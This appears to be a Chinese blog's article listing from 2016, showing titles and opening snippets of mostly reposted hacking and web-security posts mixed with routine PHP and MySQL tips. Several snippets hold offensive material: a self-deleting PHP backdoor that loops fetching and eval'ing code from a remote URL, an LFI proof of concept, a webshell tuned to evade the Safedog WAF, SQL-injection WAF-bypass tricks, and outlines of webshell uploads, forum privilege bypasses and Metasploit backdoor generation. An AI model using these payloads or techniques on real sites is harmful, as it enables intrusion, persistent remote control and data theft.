- 博客(153)
- 收藏
- 关注
转载 解决ThinkPHP中开启调试模式无法加载模块的问题。
刚开始学习ThinkPHP就遇到这种问题,还是自己粗心。 错误如下: 原因:开启调试模式,区分大小写的,要把模块名首字母大写就OK了。也就是: [plain] view plain copy http://localhost/php/fanhuar/index/index.php/index/ 改成: [html] view plain copy
2016-01-23 17:50:36 1438
原创 掌握下面常用函数,学php不再难
本帖最后由 小项 于 2016-1-21 11:41 编辑一、写入文件1.打开资源(文件)fopen($filename,$mode)2.写文件fwrite($handle,$str)3.关闭文件fclose($handle)4.一步写入file_put_contents($filename,$str,$mode) FILE_APPEND LOCK_EX}二、读文件1.读文件fread($hand
2016-01-23 17:50:34 746
原创 如何在SAE搭建属于自己的黑盒xss安全测试平台
Author:雪碧 http://weibo.com/520613815 此篇文章技术含量不高,大牛不喜勿喷,Thx!写这篇文章主要是为了各位小伙伴在SAE搭建XSSING平台的时候少走点弯路(同志们 我先去前面帮你们填好坑 =。=) 引用 XSSING平台开源中国资料: xssing 是一个基于 php+mysql的 网站 xss 利用与检测平台,可以对你的产品进行黑盒xss
2016-01-23 17:50:31 1371
原创 php包含那点事情[WOOYUN]
有空就多整理下曾经研究过的知识和需要温顾的知识,明年可能去寻工作络. 关于PHP中LFI(Local File Include,本地文件包含)漏洞,大家都很熟悉了;paper很多很多,特别是国外的...不过 大家都懒得测试,我就来整理下. 1.普通本地包含; $query=$_GET['p']; include($query); ?>poc:http://127.0.0.1:8080/phpwit
2016-01-23 17:50:29 686
原创 Mysql 漏洞利用(越权读取文件,实战怎么从低权限拿到root密码)[转]
cnrstar (Be My Personal Best!) | 2014-05-20 21:58众所周知,Mysql的用户在没有File权限情况下是无法通过Load_file读文件或者通过into dumpfile 或者into outfile去写文件,但是偶尔在一个网站上发现个小技巧,也就是通过load data infile可以读取本地文件到数据库,这样子我们就可以在低权限下通过这个bug
2016-01-23 17:50:26 4147
原创 PHP最全防止sql注入方法
(1)mysql_real_escape_string -- 转义 SQL 语句中使用的字符串中的特殊字符,并考虑到连接的当前字符集 使用方法如下: $sql = "select count(*) as ctr from users where username ='".mysql_real_escape_string($username)."' and
2016-01-23 17:50:23 4732
原创 php 上传大文件主要涉及配置upload_max_filesize和post_max_size两个选项。
今天在做上传的时候出现一个非常怪的问题,有时候表单提交可以获取到值,有时候就获取不到了,连普通的字段都获取不到了,苦思冥想还没解决,群里人问我upload_max_filesize的值改了吗,我说改了啊,。过了一会问post_max_size改了吗,,原来上传是和post_max_size有关系的。 总结:php.ini配置文件中的默认文件上传大小为2M, 默认upload_max_fil
2016-01-23 17:50:21 464
原创 彻底解决mysql中文乱码的办法
彻底解决mysql中文乱码的办法mysql -uroot -p 回车输入密码 进入mysql查看状态如下:mysql \s mysql不能插入中文默认的是客户端和服务器都用了latin1,所以会乱码。解决方案: mysql>user mydb;mysql>alter database mydb character set utf8;!另一种方法是直接修改默认的Mysql配
2016-01-23 17:50:18 340
原创 作为一个前端,可以如何机智地弄坏一台电脑?
有人说,前端的界限就在浏览器那儿。无论你触发了多少bug,最多导致浏览器崩溃,对系统影响不到哪去。这就像二次元各种炫酷的毁灭世界,都不会导致三次元的世界末日。然而,作为一个前端,我发现是有方式打开次元大门的…这个实验脑洞较大,动机无聊,但某种意义上反映了一些安全问题。想象一下,有天你在家里上网,吃着火锅还唱着歌,点开一个链接,电脑突然就蓝屏了!想想还真有点小激动。 起因故事得从local
2016-01-23 17:50:15 1015
原创 Mysql数据库字符集问题
修改mysql数据库的默认编码方式修改my.ini文件 加上 default-character-set=gb2312设定数据库字符集 alter database da_name default character set 'charset'1)设置数据库编码 /etc/my.cnf[mysqld]default-character-set=gbk...[client]
2016-01-23 17:50:13 1032
原创 echo,die(),print(),print_r(),var_dump()的区别
echo是PHP语句, print和print_r是函数,语句没有返回值,函数可以有返回值(即便没有用) print() 只能打印出简单类型变量的值(如int,string) 例子 输出 3 print_r() 可以打印出复杂类型变量的值(如数组,对象),如果让数组分行显示就需要加echo "";print_r();echo "";例子 输出
2016-01-23 17:50:10 808
原创 iis7.5加fck解析漏洞后台拿shell
记录下来 经常用到 电脑准备格式化了 一切从头开始 每天浑浑噩噩的不知道干什么。认准一样东西 认认真真的学 IIS6.0解析漏洞,可以上传a.asp;.jps或者a.asp;a.jpg或者a.asp目录下传任意格式小马,都会解析 这次讲的是IIS7.5解析漏洞, http://www.xxoo.com/fckeditor/editor/fcked
2016-01-23 17:50:07 14067
原创 Php发送post请求方法
因为自己时常用到所以还是发布一下吧/** * 发送post请求 * @param string $url 请求地址 * @param array $post_data post键值对数据 * @return string */function send_post($url, $post_data) { $postdata = http_build_query($post_d
2016-01-23 17:50:04 518
原创 利用NET HUNTER建立一个自动文件下载的网络接入点
免责声明:本文旨在分享技术进行安全学习,禁止非法利用。 本文中我将完整的阐述如何通过建立一个非常邪恶的网络接入点来使得用户进行自动文件下载。整个过程中我将使用 Nexus 9 来运行Kali NetHunter 2.0,并使用TP-LINK TLWN722N (150Mbps 版本)作为我的二级网络接口。 工具(下载地址见文末) Mana – 恶意接入点工具包。它能够实现比Kar
2016-01-23 17:49:59 1499
原创 2014自己总结的渗透经验[转]
有经验的老鸟们就不用看了。(大牛绕过)我们每当渗透一个站点的时候必须要了解他的信息。这是最基础也是最基本的常识。第一要看网站是什么脚本? 是什么程序? 有多少类的程序?系列:http://www.zzrsks.com/ 这个站点 我们可以看出是伪静态的。那么如何判断他是属于什么脚本的呢?有很多种方法我就介绍一下最基本的方法。方法1:网站根目录里index.phpindex.aspinde
2016-01-23 17:49:56 3347
原创 捡了一个非常淫荡的PHP后门,给跪了
<?phpunlink($_SERVER['SCRIPT_FILENAME']);ignore_user_abort(true);set_time_limit(0);$remote_file = 'http://xxx/xxx.txt';while($code = file_get_contents($remote_file)){ @eval($code); sleep(5);
2016-01-23 17:49:54 19577 9
原创 MS10-070 ASP.NET Padding Oracle信息泄露漏洞项目测试
MS10-070 ASP.NET Padding Oracle信息泄露漏洞1 漏洞描述:ASP.NET由于加密填充验证过程中处理错误不当,导致存在一个信息披露漏洞。成功利用此漏洞的攻击者可以读取服务器加密的数据,例如视图状态。 此漏洞还可以用于数据篡改,如果成功利用,可用于解密和篡改服务器加密的数据。 虽然攻击者无法利用此漏洞来执行代码或直接提升他们的用户权限,但此漏洞可用于产生信
2016-01-23 17:49:51 3768
原创 初探BeEF
1.什么是BeEF? 就是 The Browser Exploitation Framework 的缩写,意在通过一些手段,控制对方的浏览器。里面集成了很多模块,能够获取很多东西,有cookie,浏览器名字,版本,插件,是否支持java,vb,flash等,所以说XSS神器嘛。。大概长这个样子(默认用户名密码是beef,beef): 2.安装beef和使用beef BT5r3
2016-01-23 17:49:49 522
原创 ssh 免密码登录
sh 无密码登录要使用公钥与私钥。linux下可以用用ssh-keygen生成公钥/私钥对,下面我以CentOS为例。有机器A(192.168.1.155),B(192.168.1.181)。现想A通过ssh免密码登录到B。1.在A机下生成公钥/私钥对。 [chenlb@A ~]$ ssh-keygen -t rsa -P '' -P表示密码,-P '' 就表示空密码,也可以不用-P
2016-01-23 17:49:46 357
原创 Hydra初识
Hydra词出自希腊神话,原意是是九头蛇,后被赫拉克罗斯所杀,成为赫拉克罗斯的12件伟大功绩之一。而在计算机上HC-HYDRA是一个支持多种网络服务的非常快速的网络登陆破解工具。支持ssh,RDP,Mysql,Oracle,http,FTP等诸多协议的暴力破解hydra参数详解root@kali:~# hydra -hHydra v8.1 (c) 2014 by van Hauser/THC -
2016-01-23 17:49:43 1340
原创 制作属于自己的过狗菜刀:为菜刀添加接口
前言 中国菜刀是一个一句话连接工具,最后一版编译于20141213,时至今日仍然是一款优秀的工具。虽然菜刀本身在与服务器通信的时候做了二次编码,但到现在已经被各种WAF杀成狗。而菜刀也是没有开源的,今天就来给大家讲讲二次开发菜刀,为菜刀添加接口。定位发送函数 下断点:HttpSendRequestW,连接一句话之后,断下来,查看调用堆栈。回溯发现call 0045B330调用了HttpS
2016-01-23 17:49:41 2633 1
原创 分享PHP小马一枚,完美绕过安全狗检测。
没做免杀之前,被狗咬死: 直接上代码: $p=realpath(dirname(__FILE__)."/../").$_POST["a"];$t=$_POST["b"];$tt="";for ($i=0;$i @fwrite(fopen($p,"w"),$tt);echo "success!";?> 代码分析: $p=realpath(dirname(__FILE__)."
2016-01-23 17:49:38 7069
原创 简单几步让中国菜刀绕过安全狗
有些一句话虽然可以单独成功执行,但是在菜刀里却不能用,而有些人非觉得这样的一句话麻烦,非要用菜刀。经分析安全狗对菜刀的HTTP请求做了拦截,菜刀的POST数据里面对eval数据做了base64编码,安全狗也就依靠对这些特征来拦截,因此要想正常使用菜刀,必须在本地做一个转发,先把有特征的数据转换。这个思路类似于对伪静态注入的本地转发。首先在本地搭建WEB SERVER,然后写一个php转发程序:
2016-01-23 17:49:35 6329
原创 利用Fiddler2和Proxifier分析你用的中国菜刀是否带有后门
为了避免自己辛辛苦苦拿下的站点被一些拿来主义者不费吹灰之力就据为己有,下面来教大家如何检测菜刀有没有留后门。对于有没有后门这个问题,大牛们会说抓包看一下就行了,那如何抓包呢?有很多软件可以,这里使用的是Fiddler2(免费,E文,下载地址请问谷歌)。另外由于菜刀本身不支持代理,所以我们需要一款软件中转一下,这里用的是Proxifier。以上两款软件的下载、安装、配置过程略。首先,设置Pro
2016-01-23 17:49:33 2743
原创 三种方法完美绕过安全狗2015最新版
SQL注入:至于+ /**/就不说了,来些实际的。1、关键字可以用%(只限IIS系列)。比如select,可以sel%e%ct。原理:网络层waf对SEL%E%CT进行url解码后变成SEL%E%CT,匹配select失败,而进入asp.dll对SEL%E%CT进行url解码却变成select。IIS下的asp.dll文件在对asp文件后参数串进行url解码时,会直接过滤掉09-0d(09是t
2016-01-23 17:49:30 16636
原创 Discuz的一处越权操作,强制回复无权限帖子
合购vip 等教程论坛 都用的是Discuz看操作步骤: 随便找一处vip教程 接下来 我们审查元素 找到这段代码 然后修改回复复制代码 xxx.xxxx.xx代表该论坛的网址合购vip 就用 <a href="http://www.hegouvip.com/forum.php?mod=post&action=reply&fid=17
2016-01-23 17:49:28 4364 1
原创 Kali Nethunter初体验
1、官网环境要求:n5 n7 n10 android 4.42、实验设备:N7 android 4.4.4N7 android 4.4.3N5 nadroid 4.4.23、开发者模式+usb调试+解锁+root(一般刷过机的这些肯定都搞定了) 5、安装busybox + TWRP6、开启MTP,卡刷包导入sdcard中,完成后关闭MTP(也可以不用MTP直接adb pull
2016-01-23 17:49:25 2516
原创 php懈垢windows通用上传缺陷
#1 实例介绍本案例采用的实例是:U-Mail邮件系统。U-Mail邮件系统文件上传的地方代码是这样的: code 区域 if(ACTION =="attach-upload"){ if($_FILES){ $file_name = $_FILES['Filedata']['name']; $file_type = $_FILE
2016-01-23 17:49:20 758
原创 DZ拿shell总结
今天碰到一个dz的站,好久没拿了 ,拿下shell觉得应该总结一下Uc_server默认密码其实有了UC_SERVER就是有了网站的全部权限了,有了UC_SERVER你可以重置管理员密码可以进后台拿shell,当然你也可以不进后台拿,因为我觉得UC_server更好拿先说一下UCkey拿shell,uckey可以进uc_server后台看 附一张dz3的图 当然有了uc-server
2016-01-23 17:49:17 12459 1
原创 wooyun内网渗透教学分享之内网信息探测和后渗透准备
常规的,从web业务撕开口子url:bit.tcl.comgetshell很简单,phpcms的,一个Phpcms V9 uc api SQL的老洞直接getshell,拿到shell,权限很高,system看看网卡信息 只有一块网卡,处于10.4.22的私网地址在这里,如果我们想要通过这台机器对内网进行渗透,首要工作就是进行内网探测,介绍几个方法0x00如果你只是需要对内网的业务主机
2016-01-23 17:49:15 4179
原创 自学PHP有哪些书籍和教程值得推荐?
知乎上看到一题主询问:"自学PHP有哪些书籍和教程值得推荐?",互联网深度屌丝秦风给出了不错的答案,希望能够帮助自学PHP的朋友们。 以下仅供参考: 尤其不认可W3school之类的东西,不够深度,理解不深,比起这个更建议看官方文档,中文不清楚,看英文的。 入门视频: 入门视频推荐:哈佛大学公开课:构建动态网站 Beginner PHP and MySQL Tu
2016-01-23 17:49:12 1632 1
原创 metasploit渗透测试笔记(内网渗透篇)
x01 reverse the shell File通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行。本地监听即可获得meterpreter shell。 reverse_tcp/http/https => exe => victim => shellreverse_tcp windows:msfpayload windows/mete
2016-01-23 17:49:10 12408
原创 metasploit 渗透测试笔记(基础篇)
0x00 背景 笔记在kali linux(32bit)环境下完成,涵盖了笔者对于metasploit 框架的认识、理解、学习。这篇为基础篇,并没有太多技巧性的东西,但还是请大家认真看啦。如果在阅读中有任何问题都可以与我邮件联系(contact@x0day.me)0x01 在kali中使用metasploit 在kali中使用metasploit,需要先开启PostgreS
2016-01-23 17:49:07 1288
原创 metasploit 渗透测试笔记(meterpreter篇)
0x01 背景 meterpreter作为后渗透模块有多种类型,并且命令由核心命令和扩展库命令组成,极大的丰富了攻击方式。 需要说明的是meterpreter在漏洞利用成功后会发送第二阶段的代码和meterpreter服务器dll,所以在网络不稳定的情况下经常出现没有可执行命令,或者会话建立执行help之后发现缺少命令。 连上vpn又在内网中使用psexec和bind_tc
2016-01-23 17:49:04 1054 1
原创 中间人攻击利用框架bettercap测试
0x00前言 上篇提到内网渗透很有趣,这次就从一款新工具说起: bettercap0x01简介 bettercap可用来实现各种中间人攻击,模块化,便携、易扩展 0x02特点 提到中间人攻击,最知名的莫过于ettercap,而开发bettercap的目的不是为了追赶它,而是替代它 原因如下: 1、ettercap很成功,但在新时代下它已经老了
2016-01-23 17:49:02 2892
原创 WinRAR(5.21)-0day漏洞-始末分析
0x00 前言 上月底,WinRAR 5.21被曝出代码执行漏洞,Vulnerability Lab将此漏洞评为高危级,危险系数定为9(满分为10),与此同时安全研究人员Mohammad Reza Espargham发布了PoC,实现了用户打开SFX文件时隐蔽执行攻击代码,但是WinRAR官方RARLabs认为该功能是软件安装必备,没有必要发布任何修复补丁或升级版本。 本以为就此
2016-01-23 17:48:59 734
原创 MSF命令全集
一、msfconsole ? 帮助菜单back 从当前环境返回banner 显示一个MSF bannercd 切换目录color 颜色转换connect 连接一个主机exit 退出MSFhelp 帮助菜单info 显示一个或多个模块的信息irb 进入irb脚本模式jobs 显示和管理作业kill 杀死一个作业load 加载
2016-01-23 17:48:56 1243
原创 Bypass xss过滤的测试方法
0x00 背景 本文来自于《Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters》其中的bypass xss过滤的部分,前面有根据WAF特征确定是哪个WAF的测试方法给略过了,重点来看一下后面绕xss的一些基本的测试流程,虽说是绕WAF的,但这里还是根据WAF中的正则缺陷来绕过测试方法,并不是
2016-01-23 17:48:54 797
原创 一次域渗透尝试
先对目标站进行信息收集:扫了下目录,iis6,发现了后台,并且存在目录遍历: 存在目录遍历我寻思着找点有用的东西,看看有没有前人留下的脚印啥的,直接踩上去多方便,但是翻了一半天无果。从前台找找有没有有用的东西,发现新闻更新的挺勤的,说明管理员还是经常上线,想着x点cookie,结果找遍了都没有发现可以x的地方。 结果惊喜发现存在sql注入: 做到了这里,心想
2016-01-23 17:48:51 673
原创 移动App中常见的Web漏洞
智能手机的存在让网民的生活从PC端开始往移动端转向,现在网民的日常生活需求基本上一部手机就能解决。外卖,办公,社交,银行转账等等都能通过移动端App实现。那么随之也带来了很多信息安全问题,大量的用户信息储存在移动App中,由于移动App的开发并不健全,由移动App引发的用户信息泄露事件也层出不穷。 移动App中的Web型漏洞主要分为以下几块: 1.SQL注入漏洞 这是一
2016-01-23 17:48:48 2837 1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人